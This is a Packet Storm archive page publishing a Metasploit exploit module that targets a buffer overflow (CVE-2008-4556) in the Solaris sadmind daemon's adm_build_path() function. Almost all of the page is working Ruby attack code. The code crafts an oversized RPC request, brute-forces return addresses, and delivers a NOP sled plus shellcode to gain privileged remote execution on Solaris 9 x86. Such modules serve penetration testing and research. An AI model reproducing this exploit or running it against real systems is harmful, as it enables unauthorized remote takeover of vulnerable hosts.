exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Sun Solaris sadmind adm_build_path() Buffer Overflow

Sun Solaris sadmind adm_build_path() Buffer Overflow
Posted Oct 28, 2009
Authored by Adriano Lima | Site risesecurity.org

This Metasploit module exploits a buffer overflow vulnerability in adm_build_path() function of sadmind daemon.

tags | exploit, overflow
advisories | CVE-2008-4556
SHA-256 | 18dec71a8c83fcf83504b2fddb72739d0a61a63af0287624b6f0d47b893416c4

Sun Solaris sadmind adm_build_path() Buffer Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::SunRPC
include Msf::Exploit::Brute

def initialize(info = {})
super(update_info(info,
'Name' => 'Sun Solaris sadmind adm_build_path() Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability in adm_build_path()
function of sadmind daemon.

The distributed system administration daemon (sadmind) is the daemon used by
Solstice AdminSuite applications to perform distributed system administration
operations.

The sadmind daemon is started automatically by the inetd daemon whenever a
request to invoke an operation is received. The sadmind daemon process
continues to run for 15 minutes after the last request is completed, unless a
different idle-time is specified with the -i command line option. The sadmind
daemon may be started independently from the command line, for example, at
system boot time. In this case, the -i option has no effect; sadmind continues
to run, even if there are no active requests.
},
'Author' =>
[
'Adriano Lima <adriano@risesecurity.org>',
'ramon',
],
'Version' => '$Revision$',
'Arch' => ARCH_X86,
'Platform' => 'solaris',
'References' =>
[
['CVE', '2008-4556'],
['OSVDB', '49111'],
['URL', 'http://risesecurity.org/advisories/RISE-2008001.txt'],
],
'Privileged' => true,
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Targets' =>
[
[
'Sun Solaris 9 x86 Brute Force',
{
'Arch' => [ ARCH_X86 ],
'Platform' => 'solaris',
'Nops' => 1024 * 32,
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x08062030 },
'Stop' => { 'Ret' => 0x08072030 },
'Step' => 1024 * 30,
}
}
],
[
'Sun Solaris 9 x86',
{
'Nops' => 1024 * 4,
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x08066a60 + 2048 },
'Stop' => { 'Ret' => 0x08066a60 + 2048 },
'Step' => 1,
}
}
],
[
'Debug',
{
'Nops' => 1024 * 4,
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xaabbccdd },
'Stop' => { 'Ret' => 0xaabbccdd },
'Step' => 1,
}
}
],
],
'DefaultTarget' => 0
))

end

def brute_exploit(brute_target)
sunrpc_create('udp', 100232, 10)

unless @nops
print_status('Creating nop block...')
if target['Nops'] > 0
@nops = make_nops(target['Nops'])
else
@nops = ''
end
end

print_status("Trying to exploit sadmind with address 0x%.8x..." % brute_target['Ret'])

hostname = 'localhost'

# buf1 = rand_text_alpha(1017) + [brute_target['Ret']].pack('L')
buf1 = "A" * 1017 + [brute_target['Ret']].pack('L')
buf2 = @nops + payload.encoded

header =
XDR.encode(0) * 7 +
XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, \
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, \
hostname, 'system', rand_text_alpha(16))

body =
do_int('ADM_FW_VERSION', 1) +
do_string('ADM_LANG', 'C') +
do_string('ADM_REQUESTID', '00009:000000000:0') +
do_string('ADM_CLASS', 'system') +
do_string('ADM_CLASS_VERS', '2.1') +
do_string('ADM_METHOD', buf1) +
do_string('ADM_HOST', hostname) +
do_string('ADM_CLIENT_HOST', hostname) +
do_string('ADM_CLIENT_DOMAIN', '') +
do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
do_int('ADM_FENCE', 0) +
do_string('X', buf2) +
XDR.encode('netmgt_endofargs')

request = header + XDR.encode(header.length + body.length - 326) + body

begin
# two seconds timeout for brute force
sunrpc_call(1, request, 2)
rescue Rex::Proto::SunRPC::RPCTimeout
print_good('Server did not respond, this is expected')
end

sunrpc_destroy
handler
end

def do_string(str1, str2)
XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
end

def do_int(str, int)
XDR.encode(str, 3, 4, int, 0, 0)
end

end

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close